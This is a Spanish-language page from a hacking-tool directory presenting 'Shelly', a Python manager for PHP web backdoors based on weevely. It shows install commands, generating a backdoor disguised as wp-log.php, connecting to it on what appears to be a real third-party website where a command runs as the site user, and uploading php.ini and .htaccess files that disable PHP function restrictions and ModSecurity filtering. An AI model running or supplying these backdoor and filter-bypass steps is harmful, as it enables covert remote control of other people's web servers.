Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Shelly — Gestor simple de backdoors con Python (basado en weevely) | Kitploit
Herramientas/GitHubGitHub/tegal1337/shelly
Generación de PayloadsExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubtegal1337/shelly

Shelly

Gestor simple de backdoors con Python (basado en weevely)

Ver Repositorio
9634hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

Shelly | Gestor de Backdoors Simple con Python (basado en weevely)

Screenshoot
Shelly es una herramienta simple escrita en Python, que sirve para acceder remotamente a un sitio web

Instalación :

$ git clone https://github.com/tegal1337/Shelly
$ cd Shelly
$ python3 shell.py

Requisitos :

root@kitploit:~
sudo pip install -r requirements.txt

Ejemplo :

root@kitploit:~

python3 shell.py -g wp-log -p tegal1337
   ______      ____
  / __/ / ___ / / __ __
 _\ \/ _ / -_/ / / // /
/___/_//_\__/_/_/\_, /
                /___/  v.1
--------------------------
Python shell - Tegal1337 |
Generar :
[+] ./backdoor.py -g "nama_shell" -p "password"
Conectar al Servidor :
[+] ./backdoor.py -u "url_shell" -p "password"

Backdoor creado exitosamente con el nombre wp-log.php y la contraseña tegal1337

dalpan@Tegal1337:~/Tools$ python3 shell.py -u "https://www.pamz3d.com/wp-log.php" -p tegal1337
/opt/lampp/htdocs/php-futsal$ id
uid=501(pamz3d) gid=501(pamz3d) groups=501(pamz3d)

Screenshoot Screenshoot

Deshabilitar Bypass de Funciones :

  • buscar la carpeta con permisos 777 (rwx rwx rwx)
  • Subir el archivo php.ini
root@kitploit:~
safe_mode = OFF
disable_functions = NONE
  • Y subir el archivo .htaccess
root@kitploit:~
SecFilterEngine Off
SecFilterScanPOST Off

Artículo :

  • https://blog.tegalsec.org/meremote-sebuah-website-menggunakan-backdoor-python/

Contacto :

  • Email : [email protected]

Apoya a nuestra organización donando

Foo

Descargar herramienta